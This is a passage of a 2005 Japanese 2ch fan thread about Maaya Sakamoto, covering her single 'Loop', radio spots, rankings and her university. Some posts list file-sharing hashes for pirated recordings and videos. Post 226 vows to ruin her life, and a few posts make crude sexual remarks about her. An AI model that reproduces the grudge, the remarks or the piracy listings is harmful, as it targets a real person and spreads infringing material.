出会えてないんじゃん

135 :声の出演:名無しさん:2005/05/25(水) 13:21:48 ID:HMExohg00
ハピマテだけでなくて
ループのときのコメントはどうだったの?

136 :声の出演:名無しさん:2005/05/25(水) 14:23:15 ID:iJwPwMiXO
おまいら投票しろよ
ttp://www.37vote.net/radioact/1116601146/

137 :声の出演:名無しさん:2005/05/25(水) 14:44:13 ID:6FucqUa60
飛びぬけてコレが好き!ってのがないから_
選べない

138 :声の出演:名無しさん:2005/05/25(水) 15:09:11 ID:mkOn65xa0
[ラジオ] ループループマアヤ 20050521 坂本真綾 (雑音アリ).mp3
7,031,262 a92ad1c818c4d3b95dca6465aa92856e
ラジオ WANTED!水曜 菊池成孔 20050519 ネギまハッピー☆マテリアル 坂本真綾ループ登場.mp3
109,378,663 db03d80d523f885545e8bf8912f42047

139 :声の出演:名無しさん:2005/05/25(水) 18:07:44 ID:/bUNXwqr0
>>127
提案3
ベイビーの声で再生したら糞ワラタ

分かる奴いんのか?

140 :声の出演:名無しさん:2005/05/25(水) 18:16:42 ID:BSlIkfl/0
自演して楽しいか?

141 :声の出演:名無しさん:2005/05/25(水) 18:22:04 ID:/bUNXwqr0
レスしたら自演になるの?

142 :声の出演:名無しさん:2005/05/25(水) 18:27:35 ID:KcAbFpQV0
>>127
ロドリゲスのところはやっぱりレッド吉田の声を当てるんですか?

143 :声の出演:名無しさん:2005/05/25(水) 21:25:25 ID:0Ku2Vw/q0
>>142
ワロタw
おもわずレッドの言い方で読んでしもた。

144 :声の出演:名無しさん:2005/05/25(水) 21:34:17 ID:E+oxhBMW0
真綾か?
「100円あったらマックへ行こう!」ってCMで言ってるの。
マクドナルドの。

145 :声の出演:名無しさん:2005/05/25(水) 21:35:05 ID:LGjpiq0w0
えっ!
普通に別人だろう。

146 :声の出演:名無しさん:2005/05/25(水) 21:42:10 ID:E+oxhBMW0
そっか。似てると思ったんだが違うのか。
わざわざd

147 :声の出演:名無しさん:2005/05/25(水) 21:43:52 ID:8NvYkyTbO
上野樹里が昔の真綾に見えて仕方がない

148 :声の出演:名無しさん:2005/05/25(水) 21:49:56 ID:joDSYy5T0
ZIP−FM 5月25日 22:15−23:15
CROSS FM 5月26日 22:00−23:00
INTER-FM 5月29日 10:00−11:00

149 :声の出演:名無しさん:2005/05/25(水) 21:51:53 ID:CbRzo0c50
>>142
坂本さんでいいじゃないか。

150 :127:2005/05/25(水) 22:08:44 ID:H5YIjnBQ0
では皆様からの多数の支持によりこれからまーやの事は、

『レミゼ野郎』

と呼ぶことに決まりました。
ありがとうございました。
猫大好きだわ俺。

151 :声の出演:名無しさん:2005/05/25(水) 22:10:56 ID:joDSYy5T0
>>148
本当にこれやるの?

152 :    V          :2005/05/25(水) 22:11:09 ID:0A/gq1ar0
     川|川川  川
    ‖川 | | | ー ー||
    川川 | |ー□--□l
    川川| | \ J/||
    川川‖  | ロ|/| カタカタカタ
    川川|‖\|__|l|l  _____
   /川川川__/川川  |  | ̄ ̄\ \
   |  川川|  |/川l__,|  |    | ̄ ̄|
   |  \_|__|_|、__|  |    |__|
   |  \____|つ   |__|__/ /
   |      |  | | ̄ ̄ ̄ ̄|  〔 ̄ ̄〕
  |       | ̄

153 :声の出演:名無しさん:2005/05/25(水) 22:12:03 ID:6FucqUa60
FM中九州は?

154 :声の出演:名無しさん:2005/05/25(水) 22:22:01 ID:joDSYy5T0
ジョージとまーや出てくる気配無いよ

155 :声の出演:名無しさん:2005/05/25(水) 22:47:15 ID:WIMPvjid0
>>122
続きまだー?

156 :声の出演:名無しさん:2005/05/25(水) 23:15:39 ID:dXnvy8E90
http://page4.auctions.yahoo.co.jp/jp/auction/d54486451
http://page9.auctions.yahoo.co.jp/jp/auction/k18236604

面白いものを見つけた

157 :声の出演:名無しさん:2005/05/25(水) 23:47:03 ID:WIMPvjid0
>>156
真綾サイン変えたのか?

158 :声の出演:名無しさん:2005/05/25(水) 23:49:21 ID:WIMPvjid0
ってニセもんかよ。
申告者いいやつだな。

159 :声の出演:名無しさん:2005/05/26(木) 00:09:49 ID:XbpVovI80
>>156
メガワロス

160 :声の出演:名無しさん:2005/05/26(木) 01:37:23 ID:c5jG6vC90
wanted 再うpおね

161 :声の出演:名無しさん:2005/05/26(木) 01:37:46 ID:syVi2ADN0
帰れ

162 :声の出演:名無しさん:2005/05/26(木) 01:38:10 ID:A3wulaNw0
161↓↑『声の出演:名無しさん』 sage
帰れ

163 :声の出演:名無しさん:2005/05/26(木) 01:48:11 ID:o7oy028E0
>>156
・サインもタレント活動の一つであるため、所属プロダクション(事務所)の管理の下で、雑誌の懸賞やイベントでのプレゼント、何かの特典など正式な要請があった場合以外は書かれない。
(事務所の指導によってプライベートなサインは禁止されています。)

サインの意味ねーじゃんw
ビルゲイツですらしてくれるのに

164 :声の出演:名無しさん:2005/05/26(木) 02:20:30 ID:it/G0whY0
wanted 再うpおね

165 :声の出演:名無しさん:2005/05/26(木) 02:30:28 ID:syVi2ADN0
帰れ

166 :声の出演:名無しさん:2005/05/26(木) 02:40:32 ID:it/G0whY0
うpおね

167 :声の出演:名無しさん:2005/05/26(木) 02:54:44 ID:iaemDaTq0
スター・ウォーズエピソード1
ファントム・メナス

6月24日
夜9:03〜11:39 <45分拡大>

また1かよおノ><ノ

168 :声の出演:名無しさん:2005/05/26(木) 03:15:05 ID:KSiUc+wy0
(ラジオ)坂本真綾「ループ」をボロクソに言うラジオ(編集済).mp3 6,593,063 26d83d59d9868304d84590eba04be69d

169 :声の出演:名無しさん:2005/05/26(木) 03:16:38 ID:as93lXdW0
>>163
つまり宅急便も受け取るにも事務所の許可が必要かと

170 :声の出演:名無しさん:2005/05/26(木) 04:03:38 ID:KSiUc+wy0
(ラジオ) fm osaka スペシャル オアシス祭(ジョージ・ウィリアムス 坂本真綾)(2005.05.22.fm-osaka).mp3 52,011,258 87b2897670343d9bd393d4c3e6f0ea53
[ラジオ] BayFM BAY COMFORT 2005年05月12日 坂本真綾.mp3 33,496,501 f9fef191eb3b60b09c8dba0dd9846d5a
[ラジオ] TOKYO FM yellow tail music tail 第19回 2005年05月15日 坂本真綾.mp3 2,457,567 edb9aa377f9330d66c67b4629afaa998
[ラジオ] 坂本真綾 ビタミンM 2005年05月17日 第163回.mp3 21,066,395 6c8142aacbcb75b83a34eeccd1b48804
(ラジオ) 坂本真綾のビタミンM #163 (JOGV-FM 2005.5.17).mp3 WsORz9ftkL 21,090,315 8afd7d1c25fd6dbf20d16d64fc97600f
(声優・雑誌)hm3 SPECIAL Vol.11 巻頭特集:水樹奈々 巻末特集:坂本真綾.zip RUtI9q2rj8 111,007,931 2552f7b7653bf876cbc89d2acb2959ee
[PV 声優] 坂本真綾 - ループ [ツバサ・クロニクル ED] (M-ON 640x480 WMV9).avi CIL55Nwgbs 71,006,450 9575606cc3b5c5bce4763521f41343c5
(PV) (声優)坂本真綾[ループ] 640×480 Divx5.21.avi 71Ab71GjxD 62,382,262 27afcd0a467246aecca9cbea7e77ea88
[ラジオ] ループループマアヤ 20050521 坂本真綾 (雑音アリ).mp3 7,031,262 a92ad1c818c4d3b95dca6465aa92856e


171 :声の出演:名無しさん:2005/05/26(木) 04:07:21 ID:KSiUc+wy0
こむちゃっとカウントダウン 第135回 050507(小清水亜美・櫻井孝宏 ゲスト:坂本真綾).mp3 20,850,886 53f59b3f97e63353d2b0bf2b1038be6f


172 :声の出演:名無しさん:2005/05/26(木) 08:22:42 ID:BcYPwmip0
もしもシリーズ 『何かの間違いでレミゼのインタビュー(フジTV)が真綾にきたら…』

イ 「今回はエポニーヌ役を演じてらっしゃるということで、何か演技で気をつけてる所とかありますか?」
真 「そうですね、やっぱり?あの女優として?あの、自然なですね、お芝居を…」
イ 「共演者には別所さんなど有名な俳優さんがいらっしゃいますが」
真 「あの、別所さんといえばハムの人じゃないですか」
イ 「は、ハム?」
真 「CMですよ、ほらハムの人。だからあたし、稽古してる時は別所さんをポークハム野郎って呼んでたんです」
イ 「はぁ…」
真 「そしたら!別所さんマジ切れしちゃってプ!あれから一言も口聞いてくれないんですプ」
イ 「あ、ところで坂本さんは声優さんとしてのお仕事もなさってるようですが」
真 「あっちは遊びですね。一応本業は女優です。あるいは歌手。アイドルではないです。彼氏募集中。」
イ 「ありがとうございました」
真 「あの、最後に一言」

真 『私のニューシングル、ループが5月22日にはちゅf0あj0あwfじゃ0ふじこ』

イ 「では続いて、共演者の別所さんです」
別 「どーもポークハムの別所です(怒)」
真 「プ 自分で言ってる」


173 :声の出演:名無しさん:2005/05/26(木) 10:08:11 ID:w7ZNctjY0
つまんね

174 :声の出演:名無しさん:2005/05/26(木) 12:38:24 ID:glgPypH10
応募者特典があるとか聞いたけど、どこにそんな情報が書いてあるか分かる?
激しく釣られた臭いんだけど。

175 :声の出演:名無しさん:2005/05/26(木) 14:19:02 ID:cDiGvped0
樹里ちゃんの吹いたサックスを真綾がすぐ手渡されて吹いてみて間接キスにしたい。。。
真綾と樹里ちゃんの間接キス。。。直接はだめwww真綾スケベだからwww

176 :声の出演:名無しさん:2005/05/26(木) 14:46:09 ID:SlY2EEi6O
どなたか、女性邦楽板の真綾スレのURL貼っていただけませんか?
どうかどうかお願いします。

177 :声の出演:名無しさん:2005/05/26(木) 14:50:15 ID:FbgwfreY0
坂本真綾 其の二十一
http://music4.2ch.net/test/read.cgi/musicjf/1115576889/

どの板かまでわかってるなら簡単にでてくるだろ・・・


178 :声の出演:名無しさん:2005/05/26(木) 15:02:37 ID:SlY2EEi6O
>>177
どうもありがとうございます。
今PC壊れていてimonaからなのですが板一覧更新しても何故か反映されずに困っていました
お陰で助かりました。ご親切に感謝します

179 :声の出演:名無しさん:2005/05/26(木) 18:08:46 ID:ghNq2ECA0
近所のampmで初めてループがかかってるの聴いた。
前からかかってたっけ?

180 :声の出演:名無しさん:2005/05/26(木) 19:08:04 ID:XhhjXhGW0
(´・ω・`)しらんがな

181 :声の出演:名無しさん:2005/05/26(木) 20:10:07 ID:tHulbF2AO
(´・ω・`)しらんがな

182 :声の出演:名無しさん:2005/05/26(木) 20:16:58 ID:FGl2BpNY0
(´・ω・`)がなと聞いて来たがな

183 :声の出演:名無しさん:2005/05/26(木) 22:26:27 ID:fOzKkYnQ0
CROSSFM聞いてる奴おらんの?

184 :声の出演:名無しさん:2005/05/26(木) 22:44:50 ID:B+AZ2/460
■ 『イエスタディをうたって 冬目 景』:ttp://www.neowing.co.jp/detailview.html?KEY=ABCA-5018

上記のマンガがアニメ化されたとき、真綾さんがヒロイン・ハル役やとうれしいな。
粗暴さといい、料理ヘタなところといい、カラス飼っているところといい、作者は真綾ファンかと思うくらい真綾さんにぴったりなお話です。ハイ。(笑)


185 :声の出演:名無しさん:2005/05/26(木) 22:57:57 ID:jJHWQL1d0
>170
どうやって聞くの?教えてエロイ人


186 :声の出演:名無しさん:2005/05/26(木) 23:26:59 ID:fOzKkYnQ0
いつものレス↓

187 :声の出演:名無しさん:2005/05/26(木) 23:27:44 ID:XCAyOZCr0
まな板おっぱい

188 :声の出演:名無しさん:2005/05/26(木) 23:46:48 ID:8SxiGyOy0
(´・ω・`)しらんがな

189 :声の出演:名無しさん:2005/05/27(金) 00:24:50 ID:tlG+Pw360
真綾もそろそろ今日のダレに取り上げられないかな。
エピソード3の放映がいい機会だと思うけど。

関西ローカルネタスマソ。

190 :声の出演:名無しさん:2005/05/27(金) 00:53:40 ID:1pPgdCRn0
>>189
関西人の俺がわからん

191 :声の出演:名無しさん:2005/05/27(金) 01:25:30 ID:tlG+Pw360
ごめん

192 :声の出演:名無しさん:2005/05/27(金) 01:58:03 ID:k3YD29pd0
>>190
ttp://mbs.jp/puipui/index2.html

ここのワンコーナー。ヾ(゚д゚)ノ゛ウェイ!


193 :声の出演:名無しさん:2005/05/27(金) 08:28:10 ID:0QxOIgrn0
ここでぷいぷいの名前が出てくるとはw
あさイチでインタビューされるようになって欲しいところでもあるけど

194 :声の出演:名無しさん:2005/05/27(金) 18:57:24 ID:L3r8Kt5fO
真綾自身は自分をアニメ畑の人とは思ってないていうか
アニメ畑の外の人間だけどアニメ仕事もたまにやってますというスタンスでいきたいのに
世間的にはアニメ畑の人が他にも色々やってるという認識で
そのズレがますます真綾の性格をキツくさせてゆくのでしたとさ

195 :声の出演:名無しさん:2005/05/27(金) 20:52:11 ID:f1cQ18R+0
すまないが日本語で言ってくれないか

196 :声の出演:名無しさん:2005/05/27(金) 20:54:08 ID:sxv0s4JX0
妄想だろ

197 :声の出演:名無しさん:2005/05/27(金) 21:20:56 ID:f1cQ18R+0
カウボーイビバップのPS2版に「伝説の歌姫」なるキャラが登場するそうだが。

198 :声の出演:名無しさん:2005/05/27(金) 21:45:44 ID:6LltcBrw0
要するにあれでしょ
『アーティスト』気取りってやつ
飯島真理に似てますね
アニメもアニオタも死ぬ程嫌いだけど、くる仕事は全部アニメ関係
そのうち真綾も「ロスいくのら〜」ってアメリカ目指すんじゃねーの?

199 :声の出演:名無しさん:2005/05/27(金) 21:48:46 ID:aNt+I+q7O
声優挑戦するならば今ジャンプで一番人気のマンガの脳噛ネウロのアヤ・エイジアをやって欲しい。

200 :声の出演:名無しさん:2005/05/27(金) 21:54:01 ID:f1cQ18R+0
ドーピングコンソメマーヤ

201 :声の出演:名無しさん:2005/05/27(金) 21:55:20 ID:eGl/Yfbe0
東洋大学社会学部の卒業生として、充分な活躍だといえます。



202 :声の出演:名無しさん:2005/05/27(金) 21:59:44 ID:xdyRkm4o0
ttp://www.bounce.com/article/article.php/1917


203 :声の出演:名無しさん:2005/05/27(金) 22:00:59 ID:l7wV3AXm0
ささきヅラおのようにいい意味で開き直って欲しいけどね。w
ささきヅラおはおもいっきりテレビにもてでるわけだし。

204 :声の出演:名無しさん:2005/05/27(金) 22:03:27 ID:XB4e8yRFO
>>201
東洋大だったのか…













俺落ちたorz

205 :声の出演:名無しさん:2005/05/27(金) 22:23:52 ID:eGl/Yfbe0
>>204
それは残念でしたな。

もっとも、昔と違って学費が高いから大変だね。

206 :声の出演:名無しさん:2005/05/27(金) 23:05:15 ID:MWPrlzvl0
>>201
キロワロス

207 :声の出演:名無しさん:2005/05/28(土) 00:04:38 ID:J75I6gMs0
【音楽】オリコン上半期シングル売り上げ ケツメイシ「さくら」がトップ モー娘。初のベスト50落ち
http://news18.2ch.net/test/read.cgi/mnewsplus/1117202678/


174位おめでとうございまし ノ

208 :声の出演:名無しさん:2005/05/28(土) 00:26:12 ID:V+rW16yg0
しずちゃんってかわいいか?

209 :声の出演:名無しさん:2005/05/28(土) 00:27:00 ID:cBcY8QY30
真綾似でかわいいよ

210 :声の出演:名無しさん:2005/05/28(土) 00:40:51 ID:SYMyu6p70
いや、板違いだろ。

211 :声の出演:名無しさん:2005/05/28(土) 00:44:18 ID:+dT4G+r/0
http://passnavi.evidus.com/search_univ/2910/difficulty.html
社会A
社会
52 (偏差値)

社会A
社会心理
53 (偏差値)

社会A
社会福祉
52 (偏差値)

社会A
メディアコミュニ
52 (偏差値)

社会A
社会文化システム
51 (偏差値)



212 :声の出演:名無しさん:2005/05/28(土) 00:49:49 ID:vRYdtq/Y0
大学の話題が出て学歴厨が沸いてくるのを見ると、ここはやっぱ2chなんだなぁ

213 :声の出演:名無しさん:2005/05/28(土) 01:00:12 ID:+dT4G+r/0
http://ja.wikipedia.org/wiki/%E6%9D%B1%E6%B4%8B%E5%A4%A7%E5%AD%A6
入試ガイドではアニメキャラクターであるムーミンが登場しているが、
哲学のイメージをもっとも具現的に示しているキャラクターがムーミンであるとの理由から使用している。

アニメやアニソンが大嫌いならこんな大学に逝くな。

214 :声の出演:名無しさん:2005/05/28(土) 01:02:02 ID:cBcY8QY30
頭がお花畑な人がいる

215 :声の出演:名無しさん:2005/05/28(土) 01:21:24 ID:nKZp2xli0
嫌いなのはアニヲタだろ

216 :声の出演:名無しさん:2005/05/28(土) 01:28:47 ID:qww/nv1P0
>>179
漏れも昨日ampmで弁当温め中に「ループ」かかってるの聞いたよ。
なんかうれしくなったw

217 :声の出演:名無しさん:2005/05/28(土) 02:12:26 ID:V+rW16yg0
メガネをかけた関智一と組んで漫才をやるべし ベシ!

218 :声の出演:名無しさん:2005/05/28(土) 02:19:18 ID:Q2RymTlW0
ラジ種で真綾キター

219 :声の出演:名無しさん:2005/05/28(土) 02:29:49 ID:RWm/yEPR0
お約束の


                      ((((´・ω・`)



            (´・ω・`)))))





うp!

220 :声の出演:名無しさん:2005/05/28(土) 02:30:49 ID:pD7GdV/qO
豊口さんと仲良しなんだねー!!豊口さん気さくな人だからなんか嬉しい

221 :声の出演:名無しさん:2005/05/28(土) 05:15:56 ID:oW6fP/wM0
>>148
>INTER-FM 5月29日 10:00−11:00

スカパーのスターデジオでINTER-FMのチャンネルがあるから
デジオ加入してる人なら全国どこからでも聞けるかな。

222 :声の出演:名無しさん:2005/05/28(土) 05:39:19 ID:Csem0hhA0
(σ・∀・)σ222ゲッツ!!

223 :声の出演:名無しさん:2005/05/28(土) 10:17:13 ID:S484aG7sO
坂本真綾ってなんか落ち着いてて大人っぽい性格してそうだから
エルメス役を坂本真綾にして、
電車男をオレンジレンジのヤマトにしてほしかった
似合うぞ。きっと

224 :声の出演:名無しさん:2005/05/28(土) 10:23:46 ID:F37wIW6s0
そりゃあものすごい相乗アンチスレが出来るな

225 :声の出演:名無しさん:2005/05/28(土) 12:06:49 ID:QUPhlbeOO
俺なら無勉からでも2〜3ヵ月有りゃ受かる。
つーか半年有りゃ早稲田だって受かる自信有る。

まぁ国立は無理だけど。(英語がThis is a pen レベルから約半年でマーチ受かった俺が言うんだから間違いない)しかも一日10時間とかしてなくて。
大体5〜6時間かな。
まぁ私立の大学受験なんてこんなもんだよ。3科目なんだから。元から英語が得意だったら慶応なんて実質1教科だぜ?

226 :声の出演:名無しさん:2005/05/28(土) 12:27:01 ID:3gVZREI/0
真綾はすごい幸せそう。
幸せな家庭に育って、自分を表現できる場所がある。
物凄く羨ましい。
許せない。私はこんな惨めな生活してるのに。
私は真綾を絶対不幸にしてみせる。
わたしの一生を懸けてでも、絶対真綾を不幸にしてみせる。

227 :声の出演:名無しさん:2005/05/28(土) 12:44:30 ID:fhbyqqvBO
ミュージックスクエアの11位に真綾きたらしいね

228 :声の出演:名無しさん:2005/05/28(土) 12:55:50 ID:2motUm3iO
>>194
外部から見たらそう見える

229 :声の出演:名無しさん:2005/05/28(土) 13:19:21 ID:RaK5zaz/O
真綾は別にアニメの仕事を蔑んだりは
してない。
ラジオでも自分の出演したアニメの
話題を出すこともあるもの。
まぁ、キモオタは嫌いだろうけど、キモオタを
好きな女声優なんていないし。
声優なんて、
仕事はおおむね好きだけど、キモオタを
相手にしなきゃいけないことだけは嫌
というのが、たいがいの本音だろ。

230 :あき:2005/05/28(土) 13:34:05 ID:2Ac+g3ViO
うち東洋大(^O^)/そして真綾について熱く語った教授の授業をたまたまとった幸せモノや

231 :声の出演:名無しさん:2005/05/28(土) 13:49:47 ID:9C0ETrUb0
綺麗系なんだけど顔デカスギ

232 :声の出演:名無しさん:2005/05/28(土) 14:03:09 ID:jM0mm31I0
hanage nyo----------------n!!!!!!

233 :声の出演:名無しさん:2005/05/28(土) 15:01:08 ID:nKZp2xli0
>>230
熱く語った内容知りたい

234 :声の出演:名無しさん:2005/05/28(土) 15:23:14 ID:CCS9hSZb0
>>225
俺も英語苦手でそのレベルから少し勉強して東洋落ちたw
日大受かったけど

235 :声の出演:名無しさん:2005/05/28(土) 15:48:26 ID:vO4mkQJR0
ここで東大で菊池の授業のぞいた俺が来ましたよ

236 :声の出演:名無しさん:2005/05/28(土) 17:07:50 ID:hzl0jpjS0
>>234
http://www.ntv.co.jp/denpa/todai/38_3.html
坂本ちゃん日本大学文理学部合格!
坂本ちゃん「受かっちゃった!受かっちゃった!」
ケイコ先生「受かったよ、良かったね」
坂本ちゃん「ありがとうございます、先生。大学生になれた」
手を繋いで大泣きする坂本ちゃんとケイコ先生。
河村アナ「一番辛かったのはなんですか?」
坂本ちゃん「お勉強」
そして残りの大学の結果を見てみると、
駒沢大学仏教学部,青山学院大学経済学部第二部,帝京大学文学部,拓殖大学経済学部,
国士舘大学文学部,明治大学二部政治経済学部,高千穂商科大学商学部全てに合格していた!
合格した大学は全部で8校!

237 :声の出演:名無しさん:2005/05/28(土) 17:41:02 ID:6YVzF+T20
>>235
でたな!モングラーちゃン。

238 :声の出演:名無しさん:2005/05/28(土) 17:50:46 ID:TFMncVzD0
家から東洋大が見える俺がきましたよ

239 :声の出演:名無しさん:2005/05/28(土) 20:01:34 ID:IUv6pE1t0
C大中退の俺がきましたよ

orz

240 :声の出演:名無しさん:2005/05/28(土) 20:10:07 ID:sFbluiZT0
来てどーなるよ?

241 :声の出演:名無しさん:2005/05/28(土) 20:10:23 ID:vO4mkQJR0
>>237誰だそれ?

ループ評判微妙だけど、久々にシングルでたことだし
アルバムに期待したいな

242 :声の出演:名無しさん:2005/05/28(土) 20:43:15 ID:S2Ab3co00
ファンクラブのHPが出来てるみたいなんですけど、
ローソンで登録した1期会員はどうやってログイン
すればいいのでしょうか?
どなたか教えてくださいませ。

243 :声の出演:名無しさん:2005/05/28(土) 21:06:18 ID:KPrzGmt10
ログインするなってことじゃないか?

244 :名無し募集中。。。:2005/05/28(土) 21:29:58 ID:jKaypndU0
オリコン・モニターリサーチ「欲しいCD」
真綾キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

オリコンの自社アンケート「オールジャンル欲しいモノ・ランキング05月度」の
「欲しいCDのアーティスト名」調査で、坂本真綾が「女性編 TOP20」の16位
「男性編 TOP20」の15位にランクイン。

*4月21日〜25日、高校生から40代までの男女各世代200人ずつ、計2000人を対象に調査。
http://www.oricon.co.jp/entnews/p-et-tp0-050527-9003.html

245 :声の出演:名無しさん:2005/05/28(土) 21:39:19 ID:V+rW16yg0
ふしぎ発見のBGMでまーやの声みたいなのが流れていた。

246 :声の出演:名無しさん:2005/05/28(土) 21:49:13 ID:eoBSxXm50
菅野曲よく使う番組らしいから真綾かもよ

247 :声の出演:名無しさん:2005/05/28(土) 22:04:22 ID:F2pFd4aM0
なんかループは
ふしぎ発見のエンディングにありそうな曲調

248 :声の出演:名無しさん:2005/05/28(土) 22:08:19 ID:gsqEgJTS0
>>245
リアルタイムでは見てなかったけど録画で確認。
平泉中尊寺金色堂のシーンのバックの教会音楽っぽいやつのことでしょ。
少なくとも既存の真綾の曲ではないね。

249 :声の出演:名無しさん:2005/05/28(土) 22:22:00 ID:2x/9jj870
いきなりだけど、真綾って
オタと一般どっちにファンが多いの?

250 :声の出演:名無しさん:2005/05/28(土) 22:23:52 ID:hWImbAhs0
このCDを買った人はこんなCDも買っています

(´・ω・`)

251 :声の出演:名無しさん:2005/05/28(土) 22:45:10 ID:2E4pqYhT0
種死見たけど、真綾もう出なくていいじゃん

252 :声の出演:名無しさん:2005/05/28(土) 22:51:15 ID:V+rW16yg0
>>251
声優なんて基本的になんでもいいんだ。
ただ、この板にいる人間はまーやが出ていないとだめなんだ。

253 :声の出演:名無しさん:2005/05/28(土) 23:58:29 ID:fhbyqqvBO
だって真綾がすきなんだもん(´・ω・`)

254 :声の出演:名無しさん:2005/05/29(日) 00:34:36 ID:/T3O0QOH0
スパサカでcalltomeが声入りで流れてた

255 :声の出演:名無しさん:2005/05/29(日) 00:34:38 ID:28revwI40
またスパサカにCALL TO MEキテタ。

256 :声の出演:名無しさん:2005/05/29(日) 00:34:56 ID:Jv5AAGCS0
TBSでコールトゥミーキタ――――――――――!!!

257 :声の出演:名無しさん:2005/05/29(日) 00:34:56 ID:UUb4jRzE0
>>244
なんだか嬉しくて、ページを「名前を付けて保存」してしまった。

どーせ後から見るわけでもないのに・・・
・・・ファンの性か_| ̄|○

258 :声の出演:名無しさん:2005/05/29(日) 00:35:06 ID:KCeQCOhF0
スパサカで真綾キターーー

259 :声の出演:名無しさん:2005/05/29(日) 00:38:17 ID:MCJTPogE0
またスパサカで真綾かよ!
いったい何度目だよ(w
俺が知ってる限りで三度目だぞ。

260 :声の出演:名無しさん:2005/05/29(日) 00:38:54 ID:UUb4jRzE0
>>254-258
見れなかった(・´ω`・)残念

261 :声の出演:名無しさん:2005/05/29(日) 01:02:34 ID:wDUe/phw0
CDTV31位

262 :声の出演:名無しさん:2005/05/29(日) 01:12:44 ID:z24tID8R0
ジャパンカウントダウンで37位

263 :声の出演:名無しさん:2005/05/29(日) 01:49:56 ID:13vmAxM/0
>>184
遅レスだがそれは絶対に嫌だ

264 :声の出演:名無しさん:2005/05/29(日) 03:37:53 ID:75F1B78fO
スパサカのどの部分で使われてた?

265 :声の出演:名無しさん:2005/05/29(日) 10:14:29 ID:whtDBYhA0
いくら真綾の事が好きでも
真綾が好きでも
Oasisの事は好きになれん
シャカシャカ('A`)シャリシャリ
シスギ

266 :声の出演:名無しさん:2005/05/29(日) 10:18:29 ID:o8GLe10a0
>>265
メタルとか好きなの?

267 :265:2005/05/29(日) 10:36:16 ID:whtDBYhA0
DreamTheater、RoyalHunt、Rhapsody等々は好きだよ。
このダラダラ感がダメっぽい。アンガールズ思いだす。

すれ違いスマソ

268 :声の出演:名無しさん:2005/05/29(日) 13:37:09 ID:MVW62qNz0
>>244
アンケート方法が激しく気になる
ファン(ヲタ)というのはこういうのには律儀に対応するからのう

269 :声の出演:名無しさん:2005/05/29(日) 13:51:31 ID:39Hej/Nx0
>>217
しずちゃんの事かぁぁぁぁ!!!

270 :声の出演:名無しさん:2005/05/29(日) 14:51:21 ID:C9OGPz5w0
>>241
アルバム出たら当分の間菅野ファンからの文句を聞かねばならない…

271 :声の出演:名無しさん:2005/05/29(日) 16:15:53 ID:4SePqrMG0
家の近くのソフマップではいつも真綾さんの曲が流れています。
ソフマップと真綾さんは何か関係があるのですか?

272 :声の出演:名無しさん:2005/05/29(日) 16:21:00 ID:w6+FejrY0
無いよ

273 :声の出演:名無しさん:2005/05/29(日) 16:44:31 ID:beqY4ot70
オアシス特番で久々に真綾声が聴けたー。
オアシスもそこそこ好きだし今日は良い日。
真綾にverveも聴いて欲しいー

274 :声の出演:名無しさん:2005/05/29(日) 17:57:33 ID:MCJTPogE0
TOKYO FM で真綾番組はじまた

275 :声の出演:名無しさん:2005/05/29(日) 17:58:30 ID:MCJTPogE0
あっというまにおわた

276 :声の出演:名無しさん:2005/05/29(日) 17:59:19 ID:vbu67MTG0
>>244
本当に凄い数字だ!!
今日のダービー3連単を当てたワシに言わせれば、
あとはテレビの音楽番組出演だよ。

これしかない!!

277 :声の出演:名無しさん:2005/05/29(日) 18:00:52 ID:5rU9/Nov0
>>270
いや、自分は菅野ファンだから次のアルバムに菅野がタッチしてないなら
買いません。
だから菅野ファンからのブーイングは出ないと思うよ。

278 :声の出演:名無しさん:2005/05/29(日) 18:18:43 ID:guu3iym+0
そりゃあ真綾ファンの純度が高まって良いな
ノイズが減ってありがたいことだ

279 :声の出演:名無しさん:2005/05/29(日) 18:42:22 ID:4HHsis4H0
>>276
テレビに出て一過性のブームになったらそれこそ悲惨だぞ

280 :声の出演:名無しさん:2005/05/29(日) 18:43:17 ID:guu3iym+0
なるわけねえだろ

281 :声の出演:名無しさん:2005/05/29(日) 18:47:55 ID:k91YbAUl0
>>244
これコラ?

282 :声の出演:名無しさん:2005/05/29(日) 18:50:24 ID:tQhZ5UYs0
5月発売の一覧から選ばせたんなら別に普通にこのぐらいだろう

283 :声の出演:名無しさん:2005/05/29(日) 18:55:00 ID:izs27yG20
もうちょっと素直に喜ぼうよ。
一応ビックネームがそろっている中に名前が入っているだけでも
すっげーじゃん。

284 :声の出演:名無しさん:2005/05/29(日) 19:02:59 ID:9ifoBRVS0
>>282
4、5月発売したCDがどれだけあると思ってんだ

285 :声の出演:名無しさん:2005/05/29(日) 19:05:32 ID:GhuTCbEe0
分母2000人の15位じゃ、実数何人いたか分かったもんじゃないけどな(ノ∀^)

286 :声の出演:名無しさん:2005/05/29(日) 19:19:41 ID:guu3iym+0
思ってる以上に大衆化してるしメジャーですよ

287 :声の出演:名無しさん:2005/05/29(日) 19:20:53 ID:13vmAxM/0
>>277
cloud 9 と Tell me what the rain knows が入ってるかも

288 :声の出演:名無しさん:2005/05/29(日) 19:23:14 ID:w6+FejrY0
良い事だ

289 :声の出演:名無しさん:2005/05/29(日) 19:27:37 ID:/kQ7UiJc0
確かに喜ばしいことだけど、同順位があまりにも多すぎなのがちょっと気になる。


290 :声の出演:名無しさん:2005/05/29(日) 20:08:58 ID:4HHsis4H0
アニヲタの組織票
糸冬

291 :声の出演:名無しさん:2005/05/29(日) 20:11:57 ID:yJcJzRV40
二( ^ω^)二⊃          /⌒ヽ
  |    /  /⌒ヽ  ⊂二二( ^ω^)二⊃        光る風を追い越したらー
  ( ヽノ 二( ^ω^)/⌒ヽ   |    /
  ノ>ノ   ⊂二二二( ^ω^)二⊃ ヽノ    /⌒ヽ
 レレ     ( ヽノ|    /   ノ>ノ  二二( ^ω^)二⊃   君にきっと逢えるねー
        ノ /⌒ヽ     レレ      |   /
  ⊂二二二( ^ω^)二⊃  /⌒ヽ    ( ヽノ    新しい輝き
        |    / レ  二( ^ω^)二⊃ ノ>ノ
         ( ヽノ      |    /   レレ
         ノ>ノ       ( ヽノ                      HAPPY READY GO!!
     三  レレ        ノ>ノ

292 :声の出演:名無しさん:2005/05/29(日) 20:50:19 ID:zZsDohq80
そのときずっとわたしは
くだらないレスをみていた

293 :声の出演:名無しさん:2005/05/29(日) 21:09:45 ID:beqY4ot70
俺としてはランク上位なんか上がんないで欲しい。
JPOPでメインストリームなんてろくなモンじゃない。


294 :声の出演:名無しさん:2005/05/29(日) 21:12:27 ID:guu3iym+0
お前ら普通のJ-POPが嫌いだもんねw

